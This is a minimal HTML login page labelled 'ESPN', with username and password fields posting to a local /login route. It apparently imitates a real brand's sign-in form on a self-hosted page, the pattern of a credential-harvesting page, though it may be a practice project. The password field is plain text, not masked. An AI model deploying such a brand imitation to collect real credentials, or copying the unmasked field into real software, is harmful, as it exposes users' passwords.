<!DOCTYPE html>

<html>
<head>
    <link rel="stylesheet" href="../static/main.css">
    <title>Log In</title>
</head>

<body>
    <div class="wrapper">
        <div class="login">
            <p>ESPN</p>
            <form action="/login" method="POST">
                <input type="text" id="user" name="user" placeholder="Username or Email Address"><br>
                <input type="text" id="pass" name="pass" placeholder="Password (case sensitive)"><br>
                <input type="submit" value="Login">
            </form>
        </div>
    </div>
</body>

</html>